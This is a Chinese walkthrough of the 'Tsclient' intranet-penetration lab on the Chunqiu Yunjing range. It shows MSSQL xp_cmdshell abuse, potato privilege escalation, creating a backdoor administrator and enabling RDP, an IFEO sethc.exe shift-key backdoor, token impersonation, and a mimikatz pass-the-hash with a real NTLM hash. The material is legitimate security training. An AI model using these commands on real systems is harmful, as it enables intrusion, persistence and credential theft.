靶场练习--春秋云境-Tsclient

这篇具有很好参考价值的文章主要介绍了靶场练习--春秋云境-Tsclient。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

简介:

Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。

靶场链接:

https://yunjing.ichunqiu.com/major/detail/1072?type=1

挑战开始:

flag01:

还是先扫描下端口

靶场练习--春秋云境-Tsclient

可以发现存在mssql弱口令,还是sa用户
直接用MUDT连接
一键激活xp_cmdshell
成功执行命令
靶场练习--春秋云境-Tsclient

上传甜土豆,成功提权
靶场练习--春秋云境-Tsclient
直接添加用户,开启3389登陆

net user ljc qwer1234! /add
net localgroup administrators ljc /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

成功登陆
靶场练习--春秋云境-Tsclient
成功找到第一个flag
靶场练习--春秋云境-Tsclient

flag02:

先使用fscan探测下内网情况

172.22.8.46:445 open
172.22.8.18:445 open
172.22.8.15:445 open
172.22.8.31:445 open
172.22.8.31:139 open
172.22.8.46:139 open
172.22.8.18:139 open
172.22.8.15:139 open
172.22.8.18:135 open
172.22.8.18:1433 open
172.22.8.46:135 open
172.22.8.15:135 open
172.22.8.31:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.15:88 open
172.22.8.46:3389 open
172.22.8.15:3389 open
172.22.8.31:3389 open
172.22.8.18:3389 open
[*] WebTitle: http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[*] NetInfo:
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[*] NetInfo:
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetInfo:
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:1caf:10cc:d0a3:ff0d
[*] NetInfo:
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] NetBios: 172.22.8.31     XIAORANG\WIN19-CLIENT
[*] NetBios: 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[*] NetBios: 172.22.8.15     [+]DC XIAORANG\DC01

分析下内网情况

172.22.8.15 域控
172.22.8.31 域内机器
172.22.8.18 已拿下
172.22.8.46 域内机器

先使用mimikatz抓下密码
这里发现一个john的用户hash
靶场练习--春秋云境-Tsclient
但是密码解不开,继续做信息搜集
quser
靶场练习--春秋云境-Tsclient
发现有两个rdp,另一个登录的用户john
查看下网络连接,发现另一个是从域内机器连过来的
靶场练习--春秋云境-Tsclient
使用模拟令牌看看john账户
这里我用的SharpToken
https://github.com/BeichenDream/SharpToken
靶场练习--春秋云境-Tsclient
执行net use发现一个共享
里面有一个敏感文件,查看后获取一个凭证和一个提示(镜像劫持)
靶场练习--春秋云境-Tsclient

尝试凭证登陆31
但提示密码过期
靶场练习--春秋云境-Tsclient
使用rdesktop远程修改
proxychains4 rdesktop x.x.x.x

靶场练习--春秋云境-Tsclient

改完后尝试了下登陆,最终只能登陆进172.22.8.46

查看了下用户
发现只是普通域用户,且不是本地管理员
靶场练习--春秋云境-Tsclient
这里想到了上面的提示镜像劫持
先看看注册表权限

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

靶场练习--春秋云境-Tsclient
这里发现普通用户都可以创建

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

设置镜像劫持shift后门
靶场练习--春秋云境-Tsclient

接着锁定屏幕,按5次shift,弹出命令行,提权成功
靶场练习--春秋云境-Tsclient
接着就添加本地管理员,使用本地账号登陆
成功找到第二个flag02
靶场练习--春秋云境-Tsclient

flag03:

使用mimakatz读取密码
获取到域内机器账户密码
靶场练习--春秋云境-Tsclient
这里查看了下域管用户
发现win2016$在域管组里
靶场练习--春秋云境-Tsclient
直接用mimikatz 注入hash到lsass进程中

privilege::debug
sekurlsa::pth /user:WIN2016$ /domain:g1ts /ntlm:19b241fc247a06034210b12ae3aca2d9

成功后会弹出一个命令行
直接通过命令行可以访问域控的文件
靶场练习--春秋云境-Tsclient
成功获取第三个flag
靶场练习--春秋云境-Tsclient文章来源地址https://www.toymoban.com/news/detail-418317.html

到了这里,关于靶场练习--春秋云境-Tsclient的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 春秋云境:CVE-2022-26965

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Pluck-CMS-Pluck-4.7.16 后台RCE 解题步骤 过弱口令登录:admin 登录之后按照图中位置进行主题安装 按照这位大哥文章: https://blog.csdn.net/weixin_39639260/article/details/116105945 中说的,需要将主题中的info.php文件修改,再打包成zip再上

    2024年02月04日
    浏览(51)
  • 【春秋云境】CVE-2022-30887

    标靶介绍: 多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任

    2024年02月16日
    浏览(37)
  • 春秋云境:CVE-2022-24124

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。 解题步骤 题外话 这个题

    2024年02月01日
    浏览(39)
  • 春秋云境:CVE-2022-24112

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于

    2024年02月06日
    浏览(42)
  • 春秋云境:CVE-2022-32991(SQL注入)

    一.i春秋  二.手工注入 三.sqlmap注入 1.sqlmap注入---文件.txt 2.sqlmap--参数 附:sql注入命令 靶标介绍: 该CMS的welcome.php中存在SQL注入攻击。 打开是一个登录注册页面:  点击登录:url看着也没有sql注入 随意输入邮箱和密码:  并用bp抓包  回显用户名或者密码错误: 考虑到要找

    2024年02月06日
    浏览(39)
  • 春秋云境:CVE-2022-25401(任意文件读取漏洞)

    一、题目 二、curl访问flag文件 介绍:         Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞  进入题目 是一个登录页面 sql和暴破都无解。 官方POC  国家信息安全漏洞库 cve漏洞介绍 官方给错了目录 没有administrator/ 找不到 官方poc  代码块

    2024年02月10日
    浏览(41)
  • 春秋云境:CVE-2022-26201(二次注入漏洞)

    一、题目 二、上传权限马 三、蚁剑马连接 进入题目:  这个是和春秋云境:CVE-2022-28060一个网站,看来应该是存在多个漏洞。 点击admin 不用登录  Users ---- add users 选择文件 这里要是jpg图片格式 如果是php格式是无法运行一句话木马的 普通的一句话木马上传 在这个靶场是访问

    2023年04月21日
    浏览(39)
  • 春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞)

    一、i春秋题目 二、CVE-2022-0543:(redis沙盒逃逸) 漏洞介绍: 漏洞复现: 靶标介绍: Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。 进入题目:  SSRF漏洞: 后面加上题目给定的网站试试:  可以跳转到百度页面:  读取系统文件:IP/?url=file:///etc/passwd  获取

    2024年02月11日
    浏览(39)
  • 春秋云境:CVE-2022-29464(WSO2文件上传漏洞)

    一、题目 二、burp改包   进入题目: 是一个登录页面   这题确实没什么思路,所以看了官方POC: 因为这个漏洞已经被国家cnnvd收入了 burp抓包:不需要登录,刷新即可。  发送到重放器:根据官方POC更改即可: 这两个参数需要用本机抓包的:  如图: 在次访问登录网站,

    2024年02月08日
    浏览(43)
  • Web安全:WebGoat || VulApps 靶场搭建( 靶场漏洞测试和练习)

    WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、

    2024年02月12日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包